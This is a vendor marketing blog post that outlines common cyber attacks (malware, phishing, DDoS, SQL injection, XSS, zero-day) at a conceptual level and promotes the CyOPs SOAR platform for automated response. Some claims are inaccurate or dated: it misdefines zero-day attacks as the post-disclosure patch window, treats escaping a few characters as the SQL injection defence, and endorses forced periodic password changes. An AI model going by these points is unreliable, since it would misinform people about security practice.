Common Cybersecurity Attacks Everyone Should Know About; Is your Organization Safe?
Some of the Most Common Cybersecurity Attacks that Could Derail your Organization & How Implementing a SOAR Solution Could be your Best Line of Defense
Cyber attacks are all too common due to the increased opportunity provided by the rapid expansion of the digital world. Organizations frequently fall victim to these attacks, sometimes unknowingly, potentially causing irrefutable damage and putting valuable assets at risk. A cyber attack is a malicious and deliberate attempt to gain unauthorized access to an individual’s or an organization’s system, network, or device. Attackers are more persistent than ever as many of them are being funded, sometimes even by nation-states, be it targeted attacks or mass campaigns. Having a working knowledge of common types of cyber attacks is an important differentiator when determining how to prevent and recover from these threats.
Arguably the most common type of cyber attack, ‘malware’, which refers to various types of malicious software, files, or programs that have malicious intent of causing damage or gaining unauthorized access to a user, computer, server, or network. Malware comes in many forms including; viruses, worms, spyware, trojan horses, ransomware, etc.
The ultimate goal for malware is to gain access to a network or computer through a vulnerability, then install the malicious software. There are countless ways attackers can gain access, but most of them require the user to take action to install the malware. This can be as simple as getting a user to click on a dangerous link or open an infectious email attachment disguised as a non-threatening Word document or Excel file.
Once inside the system, malware can take a wide variety of malicious actions like; install additional malware, take over control of the user’s computer, monitor the user’s actions and keystrokes, inhibit access to a network, collect and transmit confidential data from your machine or servers to any desired destination, even make the computer totally inoperative.
Malware With CyberSponse’s CyOPs™ SOAR
CyberSponse’s SOAR solution can assist in the detection of malware and aid in recovery by automating the process. For example, your organization’s FirePower IDS/IPS tool detects outbound C2 traffic to an external IP address and then sends the alert to Splunk. Splunk sends the alert to CyOPs™ via API and then CyOPs™ takes the following actions: instructs CarbonBlack EDR to quarantine the host using the CarbonBlack connector, next instructs the Palo Alto firewall to block the IP address using the Palo Alto Panorama connector, and finally generates a malware incident case and assigns an Investigation task to a SOC analyst. By automating this process with the CyOPs™ SOAR solution, the incident response can begin immediately, which is an important factor when the goal is to limit and prevent damage.
Phishing is well known as the most successful method used by actors to introduce malware into a victim network. During the reconnaissance process, actors can identify a particular company, or identify specific employees to target. These targets are often selected by their seniority level, or by their position within a company. For example, business executives may access to sensitive corporate information an actor may want to exfiltrate. Alternatively, if an actor would like to gain a foothold in a network, they can target technical staff with elevated network privileges. Delivery of malware via phishing is achieved through many means. This includes malicious links, weaponized business documents (pdf, doc, xls, etc) or direct attachment of malicious ‘exe’ or ‘zip’ files. Though these messages are delivered with many themes in an effort to entice the target to open the file, they always contain unique digital attributes (footprints) which can be blocked by security layers such as firewalls and email filtering tools.
Phishing With CyberSponse’s CyOPs™ SOAR
A typical phishing investigation in CyOPs™ is investigated by utilizing three continuous playbooks. The first playbook is responsible for fetching emails and their metadata from a designated email inbox. Alert records will be created from these ingested emails, notifying the user that these emails are suspicious and should be investigated. The second playbook in the chain will then grab these emails and run phishing investigation with your preferred tool. In the third playbook, the same process is executed on email attachments to enrich the investigation further and better detect the suspicious emails were indeed phishing emails.
Denial of service (DoS or DDoS)
Denial of service attacks impact the availability of systems or networks by exhausting resources. If a website is flooded with more network traffic than its architecture is able to process, it will limit the ability of legitimate users to access the website. This can happen in normal circumstances, for example during Black Friday when online shopping traffic is at its peak. Malicious actors can also perform denial of service attacks. Also known as Distributed Denial of Service (DDoS) attacks, malicious actors can hijack network infrastructure around the world and use it to send traffic floods to victim networks, impacting system availability. Systems should be stress tested and have protections in place such as rate limiting and/or by utilizing Content Delivery Networks (CDNs) such as CloudFront or Akamai to prevent DDoS attacks from impacting sites.
DDoS With CyberSponse’s CyOPs™ SOAR
For a DDoS attack, CyberSponse would establish communication with your preferred tool that detects DDoS alerts and creates a CyOPs™ alert with the identical metadata by a playbook. This playbook can either be instantly triggered by an API request made by the external tool with a push functionality or get pulled by CyOPs™ on a set schedule. After creating the alert, the investigation and remediation steps can be initiated automatically, such as blocking the IP address that initiated the DDoS attack. Another way to resolve this would be by using a Web Application Firewall to detect and then send an alert, and CyOPs would block the attacker IP addresses. Or, depending on organizational policy, CyOPs could instruct the firewall to block all inbound traffic to the target IP address to prevent the DDoS traffic from degrading throughput in the rest of the network. By automating this process with CyberSponse, an organization is able to configure and take the actions that meet their standard operating procedures and organizational policies regarding DDoS response and mitigation.
Structured Query Language (SQL) Injections
One of the most common attacks against web applications, Structured Query Language (SQL) injections, have the potential to enable unauthorized access to sensitive data. A SQL injection is when a malicious actor submits malicious data to a web application via a text box which exists on the website for the purpose of user input for things like a username or password. The malicious code entered into the text box causes the application to return information back to the actor which was not intended. An example of this could be a text box which exists on a website to collect username and password for user authentication, but it is exploited by a SQL injection to return a list of all the usernames and passwords to the application. The actor now has access to the credentials of the accounts for all system users.
In order to defend against SQL injections, certain characters should be ‘escaped’ or ignored by the web application. These include the equals sign, a single quote, and the asterisk. Scans should be run against web applications to test them to see if are susceptible to SQL injection attacks.
SQL Injections With CyberSponse’s CyOPs™ SOAR
Similar to DDoS attacks, SQL injections will be detected by either a WAF or an IDS/IPS tool. As soon as detection happens, a CyOPs™ playbook will be triggered to create an alert with the necessary metadata and follow-on response actions can again be performed by a playbook automatically, or if desired an analyst can provide input during the process as well. For example, CyOPs™ could notify the website administrator via email that a SQL injection attempt was observed, recommending that the administrator review their logs to determine if the attack was successful. If the administrator reports that the attack was successful, a playbook within CyOps would generate an incident and create a task for the forensics team to investigate the web server in-depth.
Cross Site Scripting (XSS)
One other type common type of web application attack is the Cross Site Scripting (XSS) attack. Similar to a SQL injection attack, the web application is targeted, though the purpose of a SQL injection attack is for the actor to gain access to the data stored in the web application, and in an XSS attack, the actor attempts to target visitors of the website. The malicious code will only be run when visitors of the site browse to it and their computers execute the malicious code added to the site is executed by the visitor to the site. The malicious code deployed to a website during an XSS attack could cause loss of data to the victims. As an example, any data sent to a website by the user could be captured in transit and retransmitted to infrastructure controlled by the actor. This could include credit card data, personal information, or user credentials.
XXS With CyberSponse’s CyOPs™ SOAR
Detection is essential in the prevention of XSS attacks. CyberSponse can automate this process by integrating with your organization’s EDR or IDS. The tool would detect the attack and send an alert to CyOPs™. CyOPs™ would then use a connector to instruct the web proxy to block the website.
One of the most simple types of cyber attacks are ‘zero-day’ attacks as they are highly dependant on timing and constant network monitoring. After a network vulnerability is announced, there is a period of time that exists where a patch or fix for the vulnerability isn’t yet installed or implemented. It’s during this time frame that attackers will attempt to target and exploit the vulnerability in an attempt to compromise the victim’s machine or network.
The best protection and prevention from falling victim to zero-day attacks is to closely monitor one’s network or machine, and by regularly performing infrastructure and network penetration testing. Identifying any existing vulnerabilities and implementing patches or solutions are the most effective methods of effectively preventing zero-day attacks.
Zero-Day With CyberSponse’s CyOPs™ SOAR
While prevention of a zero-day attack is nearly impossible, the CyberSponse SOAR solution can expedite the response to this type of cyber attack. CyOPS™ can automate the case management, creating and tracking tasks among teams (analysts, forensics, malware, firewall, etc.). Using IOCs (enrich indicators of compromise), integrating CyOPs™ with connectors for tools like DomainTools and VirusTotal can also assist in recovery from this type of cyber attack. Creating custom playbooks in CyOPs™ for your IDS and IPS tools which will automate this process will also reducing response time and closing the vulnerability window.
Prevention & Recovery
Overall, practicing good cyber hygiene and having an awareness of the types of threats that exist can help in the prevention of cyber attacks. Implementing simple things can assist in the protection of your networks and systems such as; performing recurring backups, restricting users access, using use two-factor authentication when available, encrypting sensitive data, and creating a password policy with mandatory time-based changes, and length or complexity requirements.
Additionally, we only discussed several of the most common cyber attacks, but with all the many different types of cyber attacks, it’s important to consider all of the available resources that could benefit your particular environment. One type of resource that has recently taken the market by storm are SOAR solutions, like the industry-leading CyberSponse CyOPs™ SOAR solution. A SOAR solution is a “Security Orchestration and Automation Incident Response Platform, that incorporates the tools that your organization already uses and maximizes them by dramatically increasing the efficiency and effectiveness. CyberSponse offers the only patented security orchestration and automation incident response SOAR platform that fills the gap between automation-only and human dependent security for organizations.
By implementing the CyberSponse CyOPs™ SOAR platform in your environment analysts will be enabled to efficiently evaluate threats by automating the collection of data from hundreds of enterprise security tools. The raw log data collected and pre-processed by CyOPs™ SOAR is then presented to analysts in a concise, visually appealing way, enabling near real-time evaluation of an attacker’s progression in the attack lifecycle. In addition to presenting data to the analyst, the CyOPs™ SOAR platform documents this information as part of its incident management/case management functionality. This approach reduces alert fatigue and enables analysts to evaluate attack scenarios and security incidents efficiently, ensuring analytical outputs are available to all members of the team in real-time.
Curious About Potentially Incorporating a SOAR Solution in your Organization’s Environment?
Try our FREE Community Edition for 45 Days, and See How CyOPs Can Streamline your Environment!
For a 60 Day FREE Trial of Community Edition, Write “Marketing” Under Referred & We’ll Give you an Additional 15-Day Extension!
– Or –
Complete & Submit the Form Below for your 60 Day FREE Trial!
Find us on LinkedIn
Follow us on Twitter